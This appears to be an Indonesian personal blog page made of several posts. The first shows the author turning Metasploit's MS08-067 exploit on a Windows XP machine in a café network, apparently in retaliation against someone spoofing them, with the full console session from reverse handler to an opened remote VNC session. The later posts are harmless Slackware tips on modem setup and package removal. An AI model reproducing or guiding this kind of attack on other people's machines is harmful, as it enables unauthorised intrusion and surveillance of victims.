REMOTE DESKTOP WINDOWS XP IN METASPLOIT

sy mo curhat nih .... keriman di warkop sy main ma tmn2,setelah beberapa menit main di warkop tiba koneksi lambat sempat sy RTO (recuest time out)
untungnya sj sy blom login di emal,Fb dll. ternyata ehh ternyata ada pake netcut,tuxcut ato apalah lucuhnya lagi org itu spoofing sy kata org chee...mo nyadap pass: tp sayang sy nyadap duluan hehehehehehe...

yuk ngintip org jahat


to the poin aja the 




bash-4.1$ su
Password: 


oot *-* vim-n4n0:/home/vim-n4n0# msfconsole                                                                                                                                  
 

>>>M3T45PL01T3<<<<<                                                                                                                                                                       

       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 567 exploits - 283 auxiliary
+ -- --=[ 211 payloads - 27 encoders - 8 nops
       =[ svn r9861 updated 117 days ago (2010.07.19)


Warning: This copy of the Metasploit Framework was last updated 117 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show exploits   
msf exploit(ms08_067_netapi) > set RHOST 192.168.2.109 ====>(IP TARGET)
RHOST => 192.168.2.109
msf exploit(ms08_067_netapi) > set LHOST 192.168.2.111 ====>(IP SAYA)

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.2.111:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (445440 bytes) to 192.168.2.109
[*] VNC Server session 2 opened (192.168.2.111:4444 -> 192.168.2.109:2040) at 2010-11-13 23:24:22 +0800
[*] Starting local TCP relay on 127.0.0.1:5900... ======> LOCALHOST (PORT 5900)
[*] Local TCP relay started.
[-] Failed to launch vncviewer.  Is it installed and in your path? ========> (AKTIFKAN REMOTE DESKTOP VIEWER FOR SLACKWARE)
[*] Session 2 created in the background.
msf exploit(ms08_067_netapi) > 


nah ada failed the ...[-] Failed to launch vncviewer.  Is it installed and in your path? knp failed ??? tanya ibu budi...hehehehe
yang failed itu cuman VNCviewer nya blom aktik gtu...untung aja slackware sy pake REMOTE DESKTOP VIEWER 




nih image...target sy yg mo nyoba-nyoba nyadap pass: orang..




konek internet dengan modem vodafone in slackware

kemarin sy pengen konek ke internet pake modem vodafone...kan klo di microsoft win klo nga salam modem vodafone tuh langsung autorun software mobilenya nak klo di slackware gmn???
sy coba pake pasilitas KPPP

langsung saja...



bash-4.1$ su
Password:

kita harus membuat link untuk modem tersebut.
root *-* vim-n4n0:~# ln -sf /dev/ttyUSB0 /dev/modem

panggil KPPPnya 

nih contoh gambarnya....ok







login ID di isi dengan apa yang kita buat td
password privacy dunk ...hehehehe

nah mari berinternet riya....

googlin ahhh good luck........

REMOVE FILE ON PKGTOOL for slackware

sebelum panjang lebar sy curhat dikit tentang slackware sy nih.. kemarin sy install wireshark tux stelah
sy install wireshark,sy pengen check wireshark sy jalan ato nga ehh ternyata wireshark sy jalan.ok 





setelah itu sy mau gunakan wiresharkku ehh ternyata ehh ternyata interfacenya blom kebaca (there
are no interfaces on which a capture can be done) maklum sy
install wireshark version lama she...


nah sy coba googlin di paman google eh dapat the wireshark terbaru nih (wireshark-1.4.1) & lebih
jelasnya lagi para pengguna SLACKWARE kunjungi sj di sini nih http://slackbuild.org
sebelum sy install wireshark terbaru yg sy dapat sy ingin remove wireshark yg terinstall dl..gimana ya
caranya...???

root *-* vim-n4n0:~# upgradepkg --reinstall

setelah sy reinstall wireshark tersebut sy cek pd directory

root *-* vim-n4n0:~# cd /tmp/

kok wireshark masih ada..truz sy coba pake perintah lain yg bisa menghapus file

root *-* vim-n4n0:/tmp# removepkg

ternyata wireshark i2 blom terhapus..wiresharknya pake jampi-jampi kali ya...hehehehehe :)

nah klo kita blom yakin dengan terhapusnya faket2 yang terinstall kita bisa lihat dengan perintah
yang satu ini [ampuh lho] hehehehehe

root *-* vim-n4n0:~# pkgtool


 

root *-* vim-n4n0:~# reboot

nah itu sedikit curhat sy tentang Linux slackware moga bermanfaat bagi yang blom melakukan

GOOD LUCK...:)